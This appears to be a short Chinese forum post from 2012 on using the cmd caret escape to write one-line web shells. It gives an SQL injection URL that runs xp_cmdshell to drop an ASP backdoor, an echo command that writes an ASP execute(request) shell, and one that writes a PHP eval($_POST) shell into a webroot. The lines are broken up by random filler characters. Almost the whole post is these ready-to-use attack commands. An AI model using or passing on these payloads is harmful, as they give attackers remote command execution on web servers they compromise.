用^转义字符来写ASP(一句话木马)文件的方法: n0 L9 }0 Q/ l' X% @: R- c4 {
1 M$ G2 E+ P" R7 i1.注入点后执行 http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--
' L$ W, N. I& I6 O. e( v# c$ ^* \* |5 C( K
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >D:\doc\week6\images\2.asp
: v1 W) H9 t# q1 B
9 e6 W+ M/ u2 n! }7 B$ {( |3 O; f7 @8 o
PHP0 v1 k q6 T, p4 F, w6 n
echo ^<^?php eval^($_POST[cmd])?^>>D:\hosting\wwwroot\zlhua_cn\htdocs\1.php |
发表于 2012-9-15 14:52:31
收藏
支持
反对